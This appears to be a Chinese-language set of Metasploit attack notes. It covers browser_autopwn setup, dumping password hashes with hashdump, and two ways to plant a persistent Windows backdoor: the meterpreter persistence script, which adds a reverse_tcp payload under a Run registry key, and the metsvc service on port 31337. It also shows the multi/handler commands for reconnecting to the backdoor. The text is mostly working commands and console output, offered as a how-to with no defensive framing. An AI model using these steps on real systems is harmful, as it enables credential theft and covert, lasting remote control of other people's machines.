search autopwn
use server/browser_autopwn
show options
set LHOST
set SRVPORT
set URIPATH /
show options
修改 etter.conf 文件
if you use ipchains
if you use iptables
得到sessions后
run hashdump
run persistence -X -i 5 -p 445 -r 192.168.1.106
Metasploit之建立backdoor一二
1.meterpreter自带脚本
方法1.run presistence
可以使用run presistence -h查看选项:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139
[*] Running Persistance Script
[*] Resource file for cleanup created at
/root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139
LPORT=443
[*] Persistent agent script is 609496 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[+] Agent executed with PID 3272
[*] Installing into autorun as HKCU\Software\Microsoft\Windows
\CurrentVersion\Run\FCBCUBtLrzFY
[+] Installed into autorun as HKCU\Software\Microsoft\Windows
\CurrentVersion\Run\FCBCUBtLrzFY
可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。
连接:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LHOST 192.168.1.139
LHOST => 192.168.1.139
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
默认没启动,目标机重启后,可以成功获得meterpreter shell
方法2.run metsvc
执行metsvc 脚本
meterpreter > run metsvc -A
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP
\kqaqtcsWhBTbO...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
meterpreter >
成功连接